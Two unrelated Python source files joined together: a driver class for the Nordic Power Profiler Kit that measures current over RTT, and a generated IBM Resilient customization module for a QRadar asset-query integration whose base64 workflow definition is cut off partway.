RTT_READ_BUF_LEN = 500
PPK_CMD_WRITE_DELAY = 0.25
def __init__(self, nrfjprog_api, logprint=True):
"""A stateful interface to a Nordic Power Profiler Kit."""
self.nrfjprog_api = nrfjprog_api
self.logprint = logprint
self._connected = False
self._ext_trig_enabled = False
self._vdd = None
self._metadata = None
self._resistors = None
def connect(self):
"""Connect to the PPK and gather metadata."""
self.nrfjprog_api.sys_reset()
self.nrfjprog_api.go()
self.nrfjprog_api.rtt_start()
while not self.nrfjprog_api.rtt_is_control_block_found():
continue
# Allow the PPK firmware to start.
time.sleep(0.9)
metadata = self.nrfjprog_api.rtt_read(self.RTT_CHANNEL_INDEX, self.RTT_READ_BUF_LEN)
self._metadata = self._parse_metadata(metadata)
self._log(self._metadata)
self._vdd = int(self._metadata["VDD"])
if self._metadata['USER_R1']:
self._resistors = [float(self._metadata['USER_R1']),
float(self._metadata['USER_R2']),
float(self._metadata['USER_R3'])]
else:
self._resistors = [float(self._metadata['R1']),
float(self._metadata['R2']),
float(self._metadata['R3'])]
self._log("Resistors: LO: %s, MID: %s, HI: %s" % (self._resistors[0],
self._resistors[1],
self._resistors[2]))
self._connected = True
def reset_connection(self):
"""Stop RTT, flush it, and then connect to the PPK again."""
if not self._connected:
raise PPKError("Invalid operation: must connect first.")
self.nrfjprog_api.rtt_stop()
self._flush_rtt()
self.connect()
def get_metadata(self):
"""Return a copy of the PPK metadata that is read at the start of the connection."""
if not self._connected:
raise PPKError("Invalid operation: must connect first.")
return self._metadata.copy()
def enable_dut_power(self):
"""Turn DUT power on."""
if not self._connected:
raise PPKError("Invalid operation: must connect first.")
self._log("DUT power on.")
self._write_ppk_cmd([RTTCommand.DUT_TOGGLE, 1])
def disable_dut_power(self):
"""Turn DUT power off."""
if not self._connected:
raise PPKError("Invalid operation: must connect first.")
self._log("DUT power off.")
self._write_ppk_cmd([RTTCommand.DUT_TOGGLE, 0])
def clear_user_resistors(self):
"""Clear user resistors."""
if not self._connected:
raise PPKError("Invalid operation: must connect first.")
self._log("Clearing user resistors.")
self._resistors = [float(self._metadata['R1']),
float(self._metadata['R2']),
float(self._metadata['R3'])]
self._write_ppk_cmd([RTTCommand.RES_USER_CLEAR])
def set_user_resistors(self, user_r1, user_r2, user_r3):
"""Set USER_R1, USER_R2, and USER_R3 resistors. Values should
be floats and will be packed into four bytes.
"""
if not self._connected:
raise PPKError("Invalid operation: must connect first.")
self._log("Set user resistors: %.3f, %.3f, %.3f." % (user_r1, user_r2, user_r3))
self._resistors = [user_r1, user_r2, user_r3]
cmd = [RTTCommand.RES_USER_SET]
cmd.extend(struct.pack('f', user_r1))
cmd.extend(struct.pack('f', user_r2))
cmd.extend(struct.pack('f', user_r3))
self._write_ppk_cmd(cmd)
def enable_spike_filtering(self):
"""Enable spike filtering feature.
When this is turned on, the PPK software will filter data directly
after an automatic range switch. This will limit unwanted spikes
due to rapid switching, but may also remove short current spikes
that might be of significance.
"""
if not self._connected:
raise PPKError("Invalid operation: must connect first.")
self._log("Enabling spike filtering.")
self._write_ppk_cmd([RTTCommand.SPIKE_FILTER_ON])
def disable_spike_filtering(self):
"""Disable spike filtering feature."""
if not self._connected:
raise PPKError("Invalid operation: must connect first.")
self._log("Disabling spike filtering.")
self._write_ppk_cmd([RTTCommand.SPIKE_FILTER_OFF])
def set_external_reg_vdd(self, vdd):
"""Set VDD of external voltage regulator.
This is only recommended when using an external DUT (i.e. not the DK with a PPK
sitting on top of it). The DUT should be powered via the 'External DUT' pins.
The 'DUT Select' switch should be set to 'External'. The 'Power Select'
switch should be set to 'Reg.'.
"""
if not self._connected:
raise PPKError("Invalid operation: must connect first.")
self._log("Setting external regulator VDD to %d." % vdd)
# Setting voltages above or below these values can cause the emu connection to stall.
if (self.EXT_REG_MIN_MV > vdd) or (self.EXT_REG_MAX_MV < vdd):
raise PPKError("Invalid vdd given to set_external_reg_vdd: (%d)." % vdd)
vdd_high_byte = vdd >> 8
vdd_low_byte = vdd & 0xFF
self._write_ppk_cmd([RTTCommand.REGULATOR_SET, vdd_high_byte, vdd_low_byte])
self._vdd = vdd
def set_trigger_window(self, time_us):
"""Set the trigger window. This is the dataset transferred
upon every trigger from the PPK.
"""
if not self._connected:
raise PPKError("Invalid operation: must connect first.")
self._log("Set trigger window to %dus." % time_us)
if (self.TRIG_WINDOW_MIN_US > time_us) or (self.TRIG_WINDOW_MAX_US < time_us):
raise PPKError("Invalid time_us given to set_trigger_window: (%d)." % time_us)
window = int(time_us / self.ADC_SAMPLING_TIME_US)
high = (window >> 8) & 0xFF
low = window & 0xFF
self._write_ppk_cmd([RTTCommand.TRIG_WINDOW_SET, high, low])
def measure_average(self, time_s, discard_jitter_count=500):
"""Collect time_s worth of average measurements and return
the average along with the list of measurements.
"""
if not self._connected:
raise PPKError("Invalid operation: must connect first.")
self._log("measure_average(%d, %d)." % (time_s, discard_jitter_count))
samples_count = (time_s * self.AVERAGE_SAMPLES_PER_SECOND)
ppk_helper = PPKDataHelper()
self._start_average_measurement()
while True:
self._read_and_parse_ppk_data(ppk_helper)
collected_buffs = len(ppk_helper)
self._log("Collecting samples: %d" % collected_buffs, end='\r')
if samples_count <= collected_buffs:
break
self._log('')
self._stop_average_measurement()
self._flush_rtt()
# Only one (timestamp, avg_data) tuple is expected here.
ts, avg_buf = ppk_helper.get_average_buffs()[0]
timestamped_buf = [(ts + self.AVERAGE_TIME_US * i, avg_buf[i])
for i in range(discard_jitter_count, len(avg_buf))]
return (self.favg(avg_buf[discard_jitter_count:]), timestamped_buf)
def measure_average_long_time(self, time_s):
"""Calculates average without storing all the values in memory.
Suitable for long time measurement.
"""
if not self._connected:
raise PPKError("Invalid operation: must connect first.")
self._log("measure_long_average(%d)." % time_s)
ppk_helper = PPKDataHelper()
end_time = time.time() + time_s
accumulated_samples = 0.0
number_samples = 0
self._start_average_measurement()
while True:
self._read_and_parse_ppk_data(ppk_helper)
for pkt in ppk_helper:
if ppk_helper.is_average_pkt(pkt):
sample = ppk_helper.unpack_average(pkt)
accumulated_samples += sample
number_samples += 1
self._log("Current value: %.2f" % sample, end='\r')
if time.time() > end_time:
break
self._log('')
self._stop_average_measurement()
self._flush_rtt()
avg = accumulated_samples / number_samples
return avg
def measure_triggers(self, window_time_us, level_ua, count=1):
"""Collect count trigger buffers."""
if not self._connected:
raise PPKError("Invalid operation: must connect first.")
self._log("measure_triggers(%r, %r, %r)." % (window_time_us, level_ua, count))
self.set_trigger_window(window_time_us)
if count == 1:
self._set_single_trigger(level_ua)
else:
self._set_trigger(level_ua)
return self._measure_triggers(count)
def measure_external_triggers(self, window_time_us, count=1):
"""Wait for the 'TRIG IN' pin before capturing trigger buffers."""
if not self._connected:
raise PPKError("Invalid operation: must connect first.")
self._log("measure_external_triggers(%r, %r)." % (window_time_us, count))
self.set_trigger_window(window_time_us)
self._enable_ext_trigger_in()
return self._measure_triggers(count)
def _measure_triggers(self, count=1):
"""Wait until count trigger buffers are received."""
ppk_helper = PPKDataHelper()
samples_count = count * 2
while True:
self._read_and_parse_ppk_data(ppk_helper)
collected_buffs = len(ppk_helper)
self._log("Collecting trigger buffers: %d" % (collected_buffs/2), end='\r')
if samples_count <= collected_buffs:
break
self._log('')
if self._ext_trig_enabled:
self._disable_ext_trigger_in()
else:
self._stop_trigger()
self._flush_rtt()
result = []
for ts, trig_buf in ppk_helper.get_trigger_buffs(*self._resistors):
timestamped_buf = [(ts + self.ADC_SAMPLING_TIME_US * i, trig_buf[i])
for i in range(0, len(trig_buf))]
result.append((self.favg(trig_buf), timestamped_buf))
return result
def _enable_ext_trigger_in(self):
"""Enable the 'TRIG IN' external trigger.
The external trigger is used in place of the normal TRIG_SET
and TRIG_SINGLE_SET commands.
"""
self._log("Enable 'TRIG IN' external trigger.")
if not self._ext_trig_enabled:
self._write_ppk_cmd([RTTCommand.EXT_TRIG_IN_TOGGLE])
self._ext_trig_enabled = True
def _disable_ext_trigger_in(self):
"""Disable the 'TRIG IN' external trigger."""
self._log("Disable 'TRIG IN' external trigger.")
if self._ext_trig_enabled:
self._write_ppk_cmd([RTTCommand.EXT_TRIG_IN_TOGGLE])
self._ext_trig_enabled = False
def _start_average_measurement(self):
"""Start generating average current measurements."""
self._log("Starting average measurement.")
self._write_ppk_cmd([RTTCommand.AVERAGE_START])
def _stop_average_measurement(self):
"""Stop generating average current measurements."""
self._log("Stopping average measurement.")
self._write_ppk_cmd([RTTCommand.AVERAGE_STOP])
def _set_trigger(self, level_ua):
"""Set the trigger level.
The level_ua parameter is the current draw (in microamps) that
will activate the trigger. To convert from milliamps simply
multiply by 1000.
"""
self._log("Set trigger to %duA." % level_ua)
high = (level_ua >> 16) & 0xFF
mid = (level_ua >> 8) & 0xFF
low = level_ua & 0xFF
self._write_ppk_cmd([RTTCommand.TRIG_SET, high, mid, low])
def _set_single_trigger(self, level_ua):
"""Set the single trigger level.
The level_ua parameter is the current draw (in microamps) that
will activate the trigger. To convert from milliamps simply
multiply by 1000.
"""
self._log("Set single trigger to %duA." % level_ua)
high = (level_ua >> 16) & 0xFF
mid = (level_ua >> 8) & 0xFF
low = level_ua & 0xFF
self._write_ppk_cmd([RTTCommand.TRIG_SINGLE_SET, high, mid, low])
def _stop_trigger(self):
"""Disable trigger buffer generation."""
self._log("Stopping trigger.")
self._write_ppk_cmd([RTTCommand.TRIG_STOP])
def _write_ppk_cmd(self, byte_array):
"""Adds escape characters to byte_array and then writes it to RTT."""
self.nrfjprog_api.rtt_write(self.RTT_CHANNEL_INDEX,
PPKDataHelper.encode(byte_array),
encoding=None)
def _read_and_parse_ppk_data(self, ppk_data_helper):
"""Read bytes from the RTT channel and pass them to a PPKDataHelper.
Read [zero, RTT_READ_BUF_LEN] bytes from the RTT channel and use the
helper to decode them.
"""
byte_array = self.nrfjprog_api.rtt_read(self.RTT_CHANNEL_INDEX,
self.RTT_READ_BUF_LEN,
encoding=None)
for byte in byte_array:
ppk_data_helper.decode(byte)
def _flush_rtt(self):
"""Read and discard any available RTT bytes."""
while True:
flush_bytes = self.nrfjprog_api.rtt_read(self.RTT_CHANNEL_INDEX,
self.RTT_READ_BUF_LEN,
encoding=None)
if not flush_bytes:
break
def _log(self, logstring, **kwargs):
"""Print lof information only when logprint was set to True in __ini__."""
if self.logprint:
print(logstring, **kwargs)
@staticmethod
def favg(float_seq):
"""Return the average of a sequence of floats."""
f_sum = math.fsum(float_seq)
return f_sum / len(float_seq)
@staticmethod
def _parse_metadata(metadata_str):
"""Use a Regular Expression to parse a metadata packet."""
metadata_fields = ("VERSION", "CAL", "R1", "R2", "R3", "BOARD_ID",
"USER_R1", "USER_R2", "USER_R3", "VDD", "HI", "LO")
re_string = ('').join([
'VERSION\\s*([^\\s]+)\\s*CAL:\\s*(\\d+)\\s*',
'(?:R1:\\s*([\\d.]+)\\s*R2:\\s*([\\d.]+)\\s*R3:\\s*',
'([\\d.]+))?\\s*Board ID\\s*([0-9A-F]+)\\s*',
'(?:USER SET\\s*R1:\\s*([\\d.]+)\\s*R2:\\s*',
'([\\d.]+)\\s*R3:\\s*([\\d.]+))?\\s*',
'Refs\\s*VDD:\\s*(\\d+)\\s*HI:\\s*(\\d.+)\\s*LO:\\s*(\\d+)',
])
result = re.split(re_string, metadata_str)[1:]
metadata = {metadata_fields[i]:result[i] for i in range(0, len(metadata_fields))}
return metadata
class PPKDataHelper():
"""Encodes and decodes PPK byte arrays.
Encodes byte arrays via a class function. Decoding is a stateful
operation so an object must be instantiated. Decoded packets can
be retrieved as a list or iterated over.
"""
STX_BYTE = 0x02
ETX_BYTE = 0x03
ESC_BYTE = 0x1F
MODE_RECV = 1
MODE_ESC_RECV = 2
AVERAGE_PKT_LEN = 4
TIMESTAMP_PKT_LEN = 5
# Trigger buffer values consist of pairs of two bytes that get packed
# into a u16 with the top two bits encoding the "measurement range".
# The measurement range is defined by the R1, R2, R3 resistors or
# their USER replacements.
MEAS_RANGE_POS = 14
MEAS_RANGE_MSK = (3 << 14)
MEAS_RANGE_LO = 1
MEAS_RANGE_MID = 2
MEAS_RANGE_HI = 3
MEAS_ADC_POS = 0
MEAS_ADC_MSK = 0x3FFF
ADC_REF = 0.6
ADC_GAIN = 4.0
ADC_MAX = 8192.0
ADC_MULT = (ADC_REF / (ADC_GAIN * ADC_MAX))
def __init__(self):
"""Creates an empty object for parsing bytes."""
self._read_mode = self.MODE_RECV
self._buf = []
self._decoded = []
def __iter__(self):
return self
def __next__(self):
if not self._decoded:
raise StopIteration
else:
return self._decoded.pop(0)
def __len__(self):
return len(self._decoded)
def decode(self, byte):
"""Decode a single byte from the PPK.
Return True if the byte completes the decoding of a packet.
"""
if self.MODE_RECV == self._read_mode:
if self.ESC_BYTE == byte:
self._read_mode = self.MODE_ESC_RECV
elif self.ETX_BYTE == byte:
self._decoded.append(self._buf.copy())
self._buf.clear()
self._read_mode = self.MODE_RECV
return True
else:
self._buf.append(byte)
elif self.MODE_ESC_RECV == self._read_mode:
self._buf.append(byte ^ 0x20)
self._read_mode = self.MODE_RECV
return False
def get_decoded(self):
"""Return the list of decoded packets."""
return self._decoded
def get_average_buffs(self):
"""Return a list of parsed (timestamp, avg_data) tuples.
Every series of average measurements starts with a timestamp.
"""
result = []
ts = None
buf = None
for i in range(0, len(self._decoded)):
if self.is_timestamp_pkt(self._decoded[i]):
if ts and buf:
result.append((ts, buf[:]))
ts = self.unpack_timestamp(self._decoded[i])
buf = []
elif self.is_average_pkt(self._decoded[i]):
if ts:
buf.append(self.unpack_average(self._decoded[i]))
if ts and buf:
result.append((ts, buf[:]))
return result
def get_trigger_buffs(self, meas_res_lo, meas_res_mid, meas_res_hi):
"""Return a list of parsed (timestamp, trig_data) tuples.
Every buffer of trigger data is preceded by a timestamp.
"""
result = []
ts = None
for i in range(0, len(self._decoded)):
if self.is_timestamp_pkt(self._decoded[i]):
ts = self.unpack_timestamp(self._decoded[i])
elif self.is_trigger_pkt(self._decoded[i]):
if ts:
buf = self._decoded[i]
u16s = [self.make_u16(buf[x], buf[x+1]) for x in range(0, len(buf), 2)]
scaled = [self.scale_trigger_value(b, meas_res_lo, meas_res_mid, meas_res_hi)
for b in u16s]
result.append((ts, scaled))
ts = None
else:
ts = None
return result
def reset(self):
"""Clear the state of the object."""
self._read_mode = self.MODE_RECV
self._buf = []
self._decoded = []
@classmethod
def encode(cls, byte_array):
"""Return a byte array with added PPK escape characters."""
buf = []
buf.append(cls.STX_BYTE)
for byte in byte_array:
if byte in (cls.STX_BYTE, cls.ETX_BYTE, cls.ESC_BYTE):
buf.append(cls.ESC_BYTE)
buf.append(byte ^ 0x20)
else:
buf.append(byte)
buf.append(cls.ETX_BYTE)
return buf
@classmethod
def is_average_pkt(cls, byte_array):
"""Return True if byte_array appears to contain average data."""
return cls.AVERAGE_PKT_LEN == len(byte_array)
@classmethod
def is_timestamp_pkt(cls, byte_array):
"""Return True if byte_array appears to contain timestamp data."""
return cls.TIMESTAMP_PKT_LEN == len(byte_array)
@classmethod
def is_trigger_pkt(cls, byte_array):
"""Return True if byte_array appears to contain trigger data."""
return not cls.is_average_pkt(byte_array) and not cls.is_timestamp_pkt(byte_array)
@classmethod
def scale_trigger_value(cls, u16_value, meas_res_lo, meas_res_mid, meas_res_hi):
"""Decode a u16's measurement range and then scale it."""
meas_range = (u16_value & cls.MEAS_RANGE_MSK) >> cls.MEAS_RANGE_POS
divisor = None
if meas_range == cls.MEAS_RANGE_LO:
divisor = meas_res_lo
elif meas_range == cls.MEAS_RANGE_MID:
divisor = meas_res_mid
elif meas_range == cls.MEAS_RANGE_HI:
divisor = meas_res_hi
else:
raise PPKError("Invalid measurement range in trigger buffer: %d" % meas_range)
return (u16_value & cls.MEAS_ADC_MSK) * (cls.ADC_MULT / divisor) * 1e6
@staticmethod
def unpack_average(byte_array):
"""Decode the four bytes in byte_array into a float."""
return struct.unpack('<f', bytearray(byte_array))[0]
@staticmethod
def unpack_timestamp(byte_array):
"""Decode the first four bytes in byte_array and return a u32."""
return struct.unpack('<I', bytearray(byte_array[:4]))[0]
@staticmethod
def make_u16(low_byte, high_byte):
"""Combine two bytes into a u16."""
return (high_byte << 8) + low_byte
|
# -*- coding: utf-8 -*-
"""Generate the Resilient customizations required for fn_qradar_asset"""
from __future__ import print_function
from resilient_circuits.util import *
def codegen_reload_data():
"""Parameters to codegen used to generate the fn_qradar_asset package"""
reload_params = {"package": u"fn_qradar_asset",
"incident_fields": [],
"action_fields": [],
"function_params": [u"incident_id"],
"datatables": [u"qradar_asset_results"],
"message_destinations": [u"qradar"],
"functions": [u"qradar_asset_query"],
"phases": [],
"automatic_tasks": [],
"scripts": [],
"workflows": [u"example_qradar_asset_search"],
"actions": [u"Example: QRadar Query"]
}
return reload_params
def customization_data(client=None):
"""Produce any customization definitions (types, fields, message destinations, etc)
that should be installed by `resilient-circuits customize`
"""
# This import data contains:
# Function inputs:
# incident_id
# DataTables:
# qradar_asset_results
# Message Destinations:
# qradar
# Functions:
# qradar_asset_query
# Workflows:
# example_qradar_asset_search
# Rules:
# Example: QRadar Query
yield ImportDefinition(u"""
eyJ0YXNrX29yZGVyIjogW10sICJ3b3JrZmxvd3MiOiBbeyJ1dWlkIjogIjJiMTNhZDcyLTM4YmYt
NGIzNi1hZDM2LTZjZjhhMGM3Yzk4NCIsICJkZXNjcmlwdGlvbiI6ICJUaGlzIHdvcmtmbG93IGRl
bW9uc3RyYXRlcyB0aGUgYWJpbGl0eSB0byBydW4gdGhlIFFSYWRhciBmdW5jdGlvbiB3aGljaCBp
ZGVudGlmaWVzIHRlY2huaWNhbCBuYW1lIGFuZCBjb250YWN0IGluZm9ybWF0aW9uIGZyb20gYW4g
YXNzZXQgYW5kIGFkZHMgaXQgdG8gYSBkYXRhIHRhYmxlIGluIHRoZSBpbmNpZGVudC4iLCAib2Jq
ZWN0X3R5cGUiOiAiaW5jaWRlbnQiLCAiZXhwb3J0X2tleSI6ICJleGFtcGxlX3FyYWRhcl9hc3Nl
dF9zZWFyY2giLCAid29ya2Zsb3dfaWQiOiAxNTQsICJsYXN0X21vZGlmaWVkX2J5IjogImdlcmFs
ZC50cm90bWFuQGlibS5jb20iLCAiY29udGVudCI6IHsieG1sIjogIjw/eG1sIHZlcnNpb249XCIx
LjBcIiBlbmNvZGluZz1cIlVURi04XCI/PjxkZWZpbml0aW9ucyB4bWxucz1cImh0dHA6Ly93d3cu
b21nLm9yZy9zcGVjL0JQTU4vMjAxMDA1MjQvTU9ERUxcIiB4bWxuczpicG1uZGk9XCJodHRwOi8v
d3d3Lm9tZy5vcmcvc3BlYy9CUE1OLzIwMTAwNTI0L0RJXCIgeG1sbnM6b21nZGM9XCJodHRwOi8v
d3d3Lm9tZy5vcmcvc3BlYy9ERC8yMDEwMDUyNC9EQ1wiIHhtbG5zOm9tZ2RpPVwiaHR0cDovL3d3
dy5vbWcub3JnL3NwZWMvREQvMjAxMDA1MjQvRElcIiB4bWxuczpyZXNpbGllbnQ9XCJodHRwOi8v
cmVzaWxpZW50LmlibS5jb20vYnBtblwiIHhtbG5zOnhzZD1cImh0dHA6Ly93d3cudzMub3JnLzIw
MDEvWE1MU2NoZW1hXCIgeG1sbnM6eHNpPVwiaHR0cDovL3d3dy53My5vcmcvMjAwMS9YTUxTY2hl
bWEtaW5zdGFuY2VcIiB0YXJnZXROYW1lc3BhY2U9XCJodHRwOi8vd3d3LmNhbXVuZGEub3JnL3Rl
c3RcIj48cHJvY2VzcyBpZD1cImV4YW1wbGVfcXJhZGFyX2Fzc2V0X3NlYXJjaFwiIGlzRXhlY3V0
YWJsZT1cInRydWVcIiBuYW1lPVwiRXhhbXBsZTogUVJhZGFyIEFzc2V0IFNlYXJjaFwiPjxkb2N1
bWVudGF0aW9uPlRoaXMgd29ya2Zsb3cgZGVtb25zdHJhdGVzIHRoZSBhYmlsaXR5IHRvIHJ1biB0
aGUgUVJhZGFyIGZ1bmN0aW9uIHdoaWNoIGlkZW50aWZpZXMgdGVjaG5pY2FsIG5hbWUgYW5kIGNv
bnRhY3QgaW5mb3JtYXRpb24gZnJvbSBhbiBhc3NldCBhbmQgYWRkcyBpdCB0byBhIGRhdGEgdGFi
bGUgaW4gdGhlIGluY2lkZW50LjwvZG9jdW1lbnRhdGlvbj48c3RhcnRFdmVudCBpZD1cIlN0YXJ0
RXZlbnRfMTU1YXN4bVwiPjxvdXRnb2luZz5TZXF1ZW5jZUZsb3dfMHV4ZTRnYzwvb3V0Z29pbmc+
PC9zdGFydEV2ZW50PjxzZXJ2aWNlVGFzayBpZD1cIlNlcnZpY2VUYXNrXzBzMDEwdzdcIiBuYW1l
PVwiUVJhZGFyIEFzc2V0IFF1ZXJ5XCIgcmVzaWxpZW50OnR5cGU9XCJmdW5jdGlvblwiPjxleHRl
bnNpb25FbGVtZW50cz48cmVzaWxpZW50OmZ1bmN0aW9uIHV1aWQ9XCI5ZjdlMzFmNS04ZTEyLTRh
MzQtOWVhYi01OTg4MmEyN2M5YWJcIj57XCJpbnB1dHNcIjp7fSxcInBvc3RfcHJvY2Vzc2luZ19z
Y3JpcHRcIjpcImFzc2V0X3Jlc3VsdHMgPSByZXN1bHRzLnZhbHVlXFxuXFxuZm9yIGFzc2V0X3Jl
c3VsdCBpbiBhc3NldF9yZXN1bHRzOlxcbiAgcm93ID0gaW5jaWRlbnQuYWRkUm93KFxcXCJxcmFk
YXJfYXNzZXRfcmVzdWx0c1xcXCIpXFxuICByb3cuYXNzZXRfaWQgPSBhc3NldF9yZXN1bHRbJ2Fz
c2V0X2lkJ11cXG4gIHJvdy50ZWNobmljYWxfY29udGFjdCA9IGFzc2V0X3Jlc3VsdFsnYXNzZXRf
dGVjaG5pY2FsX2NvbnRhY3QnXVxcbiAgcm93LnRlY2huaWNhbF9uYW1lID0gYXNzZXRfcmVzdWx0
Wydhc3NldF90ZWNobmljYWxfbmFtZSddXCIsXCJwcmVfcHJvY2Vzc2luZ19zY3JpcHRcIjpcImlu
cHV0cy5pbmNpZGVudF9pZCA9IGluY2lkZW50LmlkXCJ9PC9yZXNpbGllbnQ6ZnVuY3Rpb24+PC9l
eHRlbnNpb25FbGVtZW50cz48aW5jb21pbmc+U2VxdWVuY2VGbG93XzB1eGU0Z2M8L2luY29taW5n
PjxvdXRnb2luZz5TZXF1ZW5jZUZsb3dfMGo4NWI4MTwvb3V0Z29pbmc+PC9zZXJ2aWNlVGFzaz48
c2VxdWVuY2VGbG93IGlkPVwiU2VxdWVuY2VGbG93XzB1eGU0Z2NcIiBzb3VyY2VSZWY9XCJTdGFy
dEV2ZW50XzE1NWFzeG1cIiB0YXJnZXRSZWY9XCJTZXJ2aWNlVGFza18wczAxMHc3XCIvPjxlbmRF
dmVudCBpZD1cIkVuZEV2ZW50XzE0N2x5bDhcIj48aW5jb21pbmc+U2VxdWVuY2VGbG93XzBqODVi
ODE8L2luY29taW5nPjwvZW5kRXZlbnQ+PHNlcXVlbmNlRmxvdyBpZD1cIlNlcXVlbmNlRmxvd18w
ajg1YjgxXCIgc291cmNlUmVmPVwiU2VydmljZVRhc2tfMHMwMTB3N1wiIHRhcmdldFJlZj1cIkVu
ZEV2ZW50XzE0N2x5bDhcIi8+PHRleHRBbm5vdGF0aW9uIGlkPVwiVGV4dEFubm90YXRpb25fMWt4
eGl5dFwiPjx0ZXh0PlN0YXJ0IHlvdXIgd29ya2Zsb3cgaGVyZTwvdGV4dD48L3RleHRBbm5vdGF0
aW9uPjxhc3NvY2lhdGlvbiBpZD1cIkFzc29jaWF0aW9uXzFzZXVqNDhcIiBzb3VyY2VSZWY9XCJT
dGFydEV2ZW50XzE1NWFzeG1cIiB0YXJnZXRSZWY9XCJUZXh0QW5ub3RhdGlvbl8xa3h4aXl0XCIv
PjwvcHJvY2Vzcz48YnBtbmRpOkJQTU5EaWFncmFtIGlkPVwiQlBNTkRpYWdyYW1fMVwiPjxicG1u
ZGk6QlBNTlBsYW5lIGJwbW5FbGVtZW50PVwidW5kZWZpbmVkXCIgaWQ9XCJCUE1OUGxhbmVfMVwi
PjxicG1uZGk6QlBNTlNoYXBlIGJwbW5FbGVtZW50PVwiU3RhcnRFdmVudF8xNTVhc3htXCIgaWQ9
XCJTdGFydEV2ZW50XzE1NWFzeG1fZGlcIj48b21nZGM6Qm91bmRzIGhlaWdodD1cIjM2XCIgd2lk
dGg9XCIzNlwiIHg9XCIxNjJcIiB5PVwiMTg4XCIvPjxicG1uZGk6QlBNTkxhYmVsPjxvbWdkYzpC
b3VuZHMgaGVpZ2h0PVwiMFwiIHdpZHRoPVwiOTBcIiB4PVwiMTU3XCIgeT1cIjIyM1wiLz48L2Jw
bW5kaTpCUE1OTGFiZWw+PC9icG1uZGk6QlBNTlNoYXBlPjxicG1uZGk6QlBNTlNoYXBlIGJwbW5F
bGVtZW50PVwiVGV4dEFubm90YXRpb25fMWt4eGl5dFwiIGlkPVwiVGV4dEFubm90YXRpb25fMWt4
eGl5dF9kaVwiPjxvbWdkYzpCb3VuZHMgaGVpZ2h0PVwiMzBcIiB3aWR0aD1cIjEwMFwiIHg9XCI5
OVwiIHk9XCIyNTRcIi8+PC9icG1uZGk6QlBNTlNoYXBlPjxicG1uZGk6QlBNTkVkZ2UgYnBtbkVs
ZW1lbnQ9XCJBc3NvY2lhdGlvbl8xc2V1ajQ4XCIgaWQ9XCJBc3NvY2lhdGlvbl8xc2V1ajQ4X2Rp
XCI+PG9tZ2RpOndheXBvaW50IHg9XCIxNjlcIiB4c2k6dHlwZT1cIm9tZ2RjOlBvaW50XCIgeT1c
IjIyMFwiLz48b21nZGk6d2F5cG9pbnQgeD1cIjE1M1wiIHhzaTp0eXBlPVwib21nZGM6UG9pbnRc
IiB5PVwiMjU0XCIvPjwvYnBtbmRpOkJQTU5FZGdlPjxicG1uZGk6QlBNTlNoYXBlIGJwbW5FbGVt
ZW50PVwiU2VydmljZVRhc2tfMHMwMTB3N1wiIGlkPVwiU2VydmljZVRhc2tfMHMwMTB3N19kaVwi
PjxvbWdkYzpCb3VuZHMgaGVpZ2h0PVwiODBcIiB3aWR0aD1cIjEwMFwiIHg9XCI0ODlcIiB5PVwi
MTY2XCIvPjwvYnBtbmRpOkJQTU5TaGFwZT48YnBtbmRpOkJQTU5FZGdlIGJwbW5FbGVtZW50PVwi
U2VxdWVuY2VGbG93XzB1eGU0Z2NcIiBpZD1cIlNlcXVlbmNlRmxvd18wdXhlNGdjX2RpXCI+PG9t
Z2RpOndheXBvaW50IHg9XCIxOThcIiB4c2k6dHlwZT1cIm9tZ2RjOlBvaW50XCIgeT1cIjIwNlwi
Lz48b21nZGk6d2F5cG9pbnQgeD1cIjQ4OVwiIHhzaTp0eXBlPVwib21nZGM6UG9pbnRcIiB5PVwi
MjA2XCIvPjxicG1uZGk6QlBNTkxhYmVsPjxvbWdkYzpCb3VuZHMgaGVpZ2h0PVwiMTNcIiB3aWR0
aD1cIjBcIiB4PVwiMzQzLjVcIiB5PVwiMTg0XCIvPjwvYnBtbmRpOkJQTU5MYWJlbD48L2JwbW5k
aTpCUE1ORWRnZT48YnBtbmRpOkJQTU5TaGFwZSBicG1uRWxlbWVudD1cIkVuZEV2ZW50XzE0N2x5
bDhcIiBpZD1cIkVuZEV2ZW50XzE0N2x5bDhfZGlcIj48b21nZGM6Qm91bmRzIGhlaWdodD1cIjM2
XCIgd2lkdGg9XCIzNlwiIHg9XCI3OTFcIiB5PVwiMTg4XCIvPjxicG1uZGk6QlBNTkxhYmVsPjxv
bWdkYzpCb3VuZHMgaGVpZ2h0PVwiMTNcIiB3aWR0aD1cIjBcIiB4PVwiODA5XCIgeT1cIjIyN1wi
Lz48L2JwbW5kaTpCUE1OTGFiZWw+PC9icG1uZGk6QlBNTlNoYXBlPjxicG1uZGk6QlBNTkVkZ2Ug
YnBtbkVsZW1lbnQ9XCJTZXF1ZW5jZUZsb3dfMGo4NWI4MVwiIGlkPVwiU2VxdWVuY2VGbG93XzBq
ODViODFfZGlcIj48b21nZGk6d2F5cG9pbnQgeD1cIjU4OVwiIHhzaTp0eXBlPVwib21nZGM6UG9p
bnRcIiB5PVwiMjA2XCIvPjxvbWdkaTp3YXlwb2ludCB4PVwiNzkxXCIgeHNpOnR5cGU9XCJvbWdk
YzpQb2ludFwiIHk9XCIyMDZcIi8+PGJwbW5kaTpCUE1OTGFiZWw+PG9tZ2RjOkJvdW5kcyBoZWln
aHQ9XCIxM1wiIHdpZHRoPVwiMFwiIHg9XCI2OTBcIiB5PVwiMTg0XCIvPjwvYnBtbmRpOkJQTU5M
YWJlbD48L2JwbW5kaTpCUE1ORWRnZT48L2JwbW5kaTpCUE1OUGxhbmU+PC9icG1uZGk6QlBNTkRp
YWdyYW0+PC9kZWZpbml0aW9ucz4iLCAid29ya2Zsb3dfaWQiOiAiZXhhbXBsZV9xcmFkYXJfYXNz
ZXRfc2VhcmNoIiwgInZlcnNpb24iOiA3fSwgImxhc3RfbW9kaWZpZWRfdGltZSI6IDE1NDcwNDI3
OTI4NzIsICJjcmVhdG9yX2lkIjogImdlcmFsZC50cm90bWFuQGlibS5jb20iLCAiYWN0aW9ucyI6
IFtdLCAicHJvZ3JhbW1hdGljX25hbWUiOiAiZXhhbXBsZV9xcmFkYXJfYXNzZXRfc2VhcmNoIiwg
Im5hbWUiOiAiRXhhbXBsZTogUVJhZGFyIEFzc2V0IFNlYXJjaCJ9XSwgImFjdGlvbnMiOiBbeyJs
b2dpY190eXBlIjogImFsbCIsICJuYW1lIjogIkV4YW1wbGU6IFFSYWRhciBRdWVyeSIsICJ2aWV3
X2l0ZW1zIjogW10sICJ0eXBlIjogMSwgIndvcmtmbG93cyI6IFsiZXhhbXBsZV9xcmFkYXJfYXNz
